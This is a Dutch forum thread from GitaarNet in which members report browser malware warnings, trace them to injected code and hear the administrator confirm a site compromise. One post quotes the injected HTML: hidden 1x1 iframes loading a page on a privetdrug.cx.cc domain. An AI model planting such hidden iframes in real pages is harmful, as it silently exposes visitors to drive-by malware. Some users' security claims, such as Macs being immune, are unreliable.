uhm.. dit lijkt me niet erg goed..

http://img840.imageshack.us/img840/1115/gitaarnetwaarschuwing.png (http://imageshack.us/photo/my-images/840/gitaarnetwaarschuwing.png/)

dit bericht kreeg ik toen ik op gitaarnet klikte.. toch maar de moed gehad om door te gaan..
iemand anders ditzelfde probleem?

yep hier ook.

..bekend hier ook!

wat raar.. de pagina springt de hele tijd naar boven en als ik iets typ dan gaat het en sloom en af-en-toe kan ik niet typen omdat het typvlak nietmeer geselecteerd is.

Er gaat hier volgens mij iets niet helemaal goed... Ik zie op mn ipad het forum vermengt met de google site....*

Er zit inderdaad een link naar privetdrug in de broncode. Het zit vlak na de body tag in een iframe in de div met het id "toplinks".

Net met veel moeite een screenshot gemaakt, maar iemand was me al voor..

Zelfde probleem hier..

ik merk niets.
firefox?

Ik ook geen melding ergens van, met firefox.

ook hier met firefox niets.

Er zit inderdaad een link naar privetdrug in de broncode. Het zit vlak na de body tag in een iframe in de div met het id "toplinks".

is dat een advertentie?
die zie ik namelijk nooit :D

Met een goede adblocker heb je er geen last van. De malware zit in een iframe net onder de welkomsttekst in de zwarte menubalk bovenin.



<div class="topWelcome">
Welkom op het GitaarNet.
</div>
<div class="memberBox">

<div id="toplinks" class="toplinks"><iframe width=1 height=1 frameborder=0 src=http://privetdrug.cx.cc/iframe.php?id=sommuht73v2ovpgq6auoq8oh6v5dy6z&direct=true></iframe><iframe width=1 height=1 frameborder=0 src=http://privetdrug.cx.cc/iframe.php?id=sommuht73v2ovpgq6auoq8oh6v5dy6z&direct=true></iframe><iframe width=1 height=1 frameborder=0 src=http://privetdrug.cx.cc/iframe.php?id=sommuht73v2ovpgq6auoq8oh6v5dy6z&direct=true></iframe>
<ul class="isuser">
<li><a href="login.php?

is dat een advertentie?
die zie ik namelijk nooit :D

Je hebt je bril wel op? :seriousf:

Geintje. De link zit in een 1 x 1 px groot iframe. Die zie je niet maar de link wordt wel iedere keer aangeroepen als je een pagina op het forum opent.

Trouwens, ik krijg ook geen meldingen met Firefox. Toch voor de zekerheid javascript maar even uitgeschakeld ;)

vage shit

googelen naar: privetdrug.cx.cc
geeft maar 1 pagina
bovenaan iets met: stop forum spam
en daar is het vervolgens niet te vinden.

Met een goede adblocker heb je er geen last van. De malware zit in een iframe net onder de welkomsttekst in de zwarte menubalk bovenin.


Klopt. Ik heb Adblock Plus in Firefox en dat werkt goed. Voor de Firefox gebruikers die belangstelling hebben bij deze addon: https://addons.mozilla.org/nl/firefox/addon/adblock-plus/

http://img842.imageshack.us/img842/7953/1316366602477.jpg

Lijkt me niet goed....

OMG :crazyhappy: gaat jouw scherm er van kantelen?
zandzakken voor de deur!!! :D

Dus ik ben niet de enige stoere jongen die toch door durfde te klikken na de waarschuwing? :p

Zag hier de melding net ook.. :O Ik zie ook een raar wit blokje bovenin de pagina, waarvan ik best zeker ben dat hij er bij mijn eerdere bezoeken niet was.. :s

Wie durft er op het blokje te klikken?

Wie durft er op het blokje te klikken?

ik. er is niks aan de hand met het witte blokje en er is geen virus mijn pc binnengedrongen.. dus volgens mij ligt het niet aan dat witte blokje (of wel?)

Ik merk niks....
kan aan het systeem liggen, k heb windows 7

Ik merk niks....
kan aan het systeem liggen, k heb windows 7

het kan aan verschillende browsers liggen. want ik heb ook windows 7 en gebruik google chrome en ik krijg de melding wel.

Mac OSX Lion met Chrome geeft die melding ook..
Ligt waarschijnlijk aan de browser als Firefox het niet geeft.

Ja, er gaat duidelijk iets mis. Ik heb de beheerder al op de hoogte gesteld van de melding die Chrome geeft.
Gevolgen zijn o.a. dat de cursor soms verdwijnt als je een bericht aan het typen bent en dat de pagina ineens omhoog schiet. Bij Chrome zie je dan links onder in beeld dat er links aktief zijn naar een .ru site en een .cx.cc site.
Afgezien van rapportages laat ik het forum voorlopig even links liggen tot ik van de beheerder heb gehoord.
Overigens geeft een scan met AVG geen virussen of anderszins aan op mijn computer.

Mac OSX Lion met Chrome geeft die melding ook..
Ligt waarschijnlijk aan de browser als Firefox het niet geeft.

met IE geprobeerd, niet ingelogd, niets gezien, behalve een advertentie :D

:seriousf:
toen ik in mitch' bericht "omhoog schiet" las, sprong mijn pagina omhoog.
:seriousf:

ennu. bij mij zie ik niet linksonder dat er iets bezig is, zoals mitch beschrijft..

Met Windows XP en Opera browser geen problemen gezien. Ook geen meldingen van malware- en virusscanners....

zelfde probleem, heb win7 en chrome met adblock... :dontgeti:

Hij is onderin inderdaad op die sites bezig met .ru en die andere..

Afwachten..

Heb het hier ook. Mac, dus hoef niet bang te zijn voor malware en dergelijke, maar krijg bij iedereen klik wel zo'n irritante popup

Hier gaat Norton ook aardig over zijn neck. Meerdere inbraak pogingen gemeld.

Na het scherm in de openingspost, komt nu ook deze:
http://i926.photobucket.com/albums/ad110/RoelSmoel/Schermafbeelding2011-09-18om225103.png

Na het scherm in de openingspost, komt nu ook deze:
http://i926.photobucket.com/albums/ad110/RoelSmoel/Schermafbeelding2011-09-18om225103.png

Is het een Chrome ding ofzo? Ik krijg daarin hetzelfde scherm. In IE is het geen probleem. FF ook niet...

Ik krijg hier van IE ook geen melding.
Maar van MS Security Essentials dus wel: win32/eyestye familie trojan. Geen idee of dat van deze site komt, maar het is wel de eerste virusmelding in jaren die ik krijg....

Heb het hier ook. Mac, dus hoef niet bang te zijn voor malware en dergelijke, maar krijg bij iedereen klik wel zo'n irritante popup
Haha! Geloof maar dat je met je Mac veilig bent jongen.

Het is deze source code die voor de foutmelding zorgt:
http://dl.dropbox.com/u/3822426/gitaarnetvirus.png

Schijnbaar is het een security leak in Vbulletin 4.x.x. Ik heb nog meer forums vandaag zien opduiken met hetzelfde probleem.

Niks aan de hand hier. :dontgeti: FF 7.0 beta/W7

ja, zo eenvoudig is het.

De filepermissies van de server stonden niet goed waardoor een kwaadwillige partij deze kon editeren en slechte code kon toevoegen.

VOORAL Internet Explorer gebruikers moeten opletten!!
De exotische browsers lopen iets minder gevaar.
Blijf hier weg tot de zaak opgelost is... beste wat je kan doen.

Hoe weet je het: installeer Google Chrome en wacht tot de melding verdwijnt.

Ik wil niemand onnodig bang maken, maar hoe men webbanking en dergelijke kan misbruiken begint met dergelijke praktijken.

ps: ik browse hier nu met een sandboxed browser (sandboxiecom). Gratis en super veilig ;)

aan de beheerder: misschien kunnen we in de toekomst toch ns praten over hoe linux en apache dicht te timmeren. Je mag me altijd pm'n ;)

Niks aan de hand hier. :dontgeti: FF 7.0 beta/W7
Chrome geeft waarschuwingen af als er "onbetrouwbare" websites worden benaderd. Volgensmij doen andere webbrowsers dat niet, dus daarom krijg je die melding niet.

Zie je dat kleine witte blokje helemaal bovenaan in het midden? Dat is in feite een klein gedeelte van die onbetrouwbare website.

FF met addblock en noscript. Noscript geeft niks raars aan.

*edit: de extensie cx.cc staat al geblokkeerd zie ik nu.

Chrome geeft waarschuwingen af als er "onbetrouwbare" websites worden benaderd. Volgensmij doen andere webbrowsers dat niet, dus daarom krijg je die melding niet.

Zie je dat kleine witte blokje helemaal bovenaan in het midden? Dat is in feite een klein gedeelte van die onbetrouwbare website.

jahoor, ik krijg met firefox (7 win7) ook een heel enkele keer een melding dat iets niet safe zou zijn.
maar dit wat nu hier gaande is gaat volledig aan mij voorbij, met IE ook gek genoeg.

Hoe weet je het: installeer Google Chrome en wacht tot de melding verdwijnt.


IE geeft mij juist wel (maar niet altijd) een waarschuwing via AVG. Chrome geeft GEEN waarschuwing... er zit in chrome wel een behoorlijk groot wit vlak in het midden bovenin. In IE is dat alleen een klein stipje aan de rechterkant.

Is het nu al opgelost?

ik zie het nog in de broncode

Chrome geeft waarschuwingen af als er "onbetrouwbare" websites worden benaderd. Volgens mij doen andere webbrowsers dat niet, dus daarom krijg je die melding niet.

Zie je dat kleine witte blokje helemaal bovenaan in het midden? Dat is in feite een klein gedeelte van die onbetrouwbare website.Geen kleine of grote witte blokjes o.i.d., ook niet met IE9 trouwens. Ik merk wel dat FF wat trager reageert, maar dat zou aan mijn PC kunnen liggen (of aan Gitaarnet?).

er was inderdaad iets geinjecteerd, we gaan uitzoeken hoe dit kan,

het wordt in ieder geval tijd voor de nieuwste update

Ik krijg bij Chrome nu in ieder geval geen waarschuwing meer.

Chrome gaf de melding bij mij niet omdat het een wat oudere versie was. Heb Chrome opnieuw geinstalleerd en kreeg de melding toen wel. Inmiddels niet meer. Virusscan op pc vindt geen infecties. AVG, wordt steeds bijgewerkt. AVG herkende de bedreiging gisteren ook al op de site.


Is er nog iets dat nagetrokken moet worden op pc's?

Bij mij is alles weer als van ouds :)

Hier ook.

....

Gezien de malware op die site kun je zomaar geinfecteerd zijn zonder het te merken...
Spyeye is nogal sneaky malware.

Gisteren had ik er met safari wel last van. Nadat ik FF ff installerde had ik er daarmee ook geen last van.

Zo te zien is het al weer weg.

Had dit enkel met chrome voor, niet met Firefox of IE.
En nu is het inderdaad weg :D

Ik heb het laatst ook gehad in chrome... Zit nu in tappatalk dus kan niet zien of het veilig is of niet...

Ik heb er bij een ander forum nu ook last van :/ ( http://www.apforums.com/forum.php/ )

Zijn er nog goedde tips om ff te controleren of je pc geinfecteerd is? En moet iedereen in het forum hier niet even allert op worden gemaakt en ff verwezen worden naar een manier om te zien of je geinfecteerd bent en hoe dat te verhelpen?!?

ligt het nu aan mij of zit er alweer een bug in gitaarnet?

http://img440.imageshack.us/img440/6651/buggitaarnet.png (http://imageshack.us/photo/my-images/440/buggitaarnet.png/)
(zie het balkje linksboven)

Alleen wanneer ik het scherm krijg waar ik mijn reactie in kan typen ziet niet alles er oke uit....

Edit: kan ook aan mijn ios 5 update liggen ik moet nog even wennen dat sommige dingen nu soms anders gaan :)

oh. het ligt dus niet aan GN. op andere pagina's is het ook. raar.

oh. het ligt dus niet aan GN. op andere pagina's is het ook. raar.

Hier werkt alles nog gewoon ok.

Mag ik even opmerken dat ik de laatste week ofzo moeite heb met inloggen?

Elke keer als ik inlog wordt ik wel doorgestuurd maar krijg dan bovenin geen 'Welkom, Outline' te zien: ik heb dan gewoon het scherm dat je te zien krijgt als je niet ingelogd bent.

Als ik dan op een topic oid klik, krijg ik het 'Welkom'-verhaal wel en ben ik dus gewoon ingelogd.

Iemand een idee?

wat er aan de hand is, geen idee.
Maar sinds dat probleempje van 18 sept heb ik dit ook.

Mag ik even opmerken dat ik de laatste week ofzo moeite heb met inloggen?

Elke keer als ik inlog wordt ik wel doorgestuurd maar krijg dan bovenin geen 'Welkom, Outline' te zien: ik heb dan gewoon het scherm dat je te zien krijgt als je niet ingelogd bent.

Als ik dan op een topic oid klik, krijg ik het 'Welkom'-verhaal wel en ben ik dus gewoon ingelogd.

Iemand een idee?

dit heb ik op mijn werk ook,.. en thuis blijft hij na het inloggen weer uitgelogd weergegeven..

Ik ben benieuwd wie er een gedegen antwoord op gaat geven... Of niks zegt en het gewoon oplost.

op school (Internet explorer) kom ik niet ingelogd op gitaarnet, Op mijn laptop (google chrome) heb ik hetzelfde probleem als jou en op mijn gewone PC (ook Google chrome) doet alles het normaal.
dus waarschijnlijk moeten we gewoon op een update wachten ;)

Ik heb het probleem gemeld bij de beheerder.

Ik herken het wel. Bij mij werkt het als ik na het inloggen (er staat nu nog steeds dat ik niet geregistreerd ben ) klikken op een subforum. Dan ben ik ineens wel ingelogd.

Mag ik even opmerken dat ik de laatste week ofzo moeite heb met inloggen?

Elke keer als ik inlog wordt ik wel doorgestuurd maar krijg dan bovenin geen 'Welkom, Outline' te zien: ik heb dan gewoon het scherm dat je te zien krijgt als je niet ingelogd bent.

Als ik dan op een topic oid klik, krijg ik het 'Welkom'-verhaal wel en ben ik dus gewoon ingelogd.

Iemand een idee?

het heeft iig te maken met cookies, waar iedere browser afhankelijk van eigen instellingen weer anders mee omgaat

- heb je in je adresbalk www.gitaarnet.nl/forum staan of http://gitaarnet.nl/forum?
- bekijk je het forum via een bookmark die je voor de laatste upgrade had aangemaakt?

(geldt ook voor de anderen met hetzelfde probleem)

het heeft iig te maken met cookies, waar iedere browser afhankelijk van eigen instellingen weer anders mee omgaat

- heb je in je adresbalk www.gitaarnet.nl/forum staan of http://gitaarnet.nl/forum?
- bekijk je het forum via een bookmark die je voor de laatste upgrade had aangemaakt?

(geldt ook voor de anderen met hetzelfde probleem)

Nou, ik heb het probleem zowel op mijn laptop met Windows7 en IE9 als op m'n pc met XP SP3 en IE8. En bij een ander forum wat op dezelfde software draait (http://www.licht-geluid.nl/forum/) heb ik het probleem niet.

Ik heb overigens dit: http://www.gitaarnet.nl/forum/forum.php in de adresbalk staan. Als je het weet mag je het zeggen.

Even snel proberen in Chrome levert wisselende resultaten. De truc lijkt ook te zitten in het onthouden van gegevens: dus herkenning van je nickname die je intikt. Bij IE9 wordt bij mij standaard niks onthouden en bij Chrome wel. Maar op mijn pc met IE8 heb ik het probleem ook terwijl die wel de gegevens onthoudt.

Bijkomende grap is dat om een of andere reden de meldingen dat er in een sub-forum of topic nieuwe posts staan (het gitaartje zeg maar) na een paar posts gelezen te hebben, uit zichzelf uit gaan. Dan kan ik vervolgens dus alles zelf handmatig gaan zitten scannen op nieuwe posts. IIg niet grappig!

Iemand?

het heeft iig te maken met cookies, waar iedere browser afhankelijk van eigen instellingen weer anders mee omgaat

- heb je in je adresbalk www.gitaarnet.nl/forum staan of http://gitaarnet.nl/forum?
- bekijk je het forum via een bookmark die je voor de laatste upgrade had aangemaakt?

(geldt ook voor de anderen met hetzelfde probleem)

Op deze manier is het probleem bij mij verholpen en kan ik naar alle tevredenheid weer browsen.
Bedankt! :ok: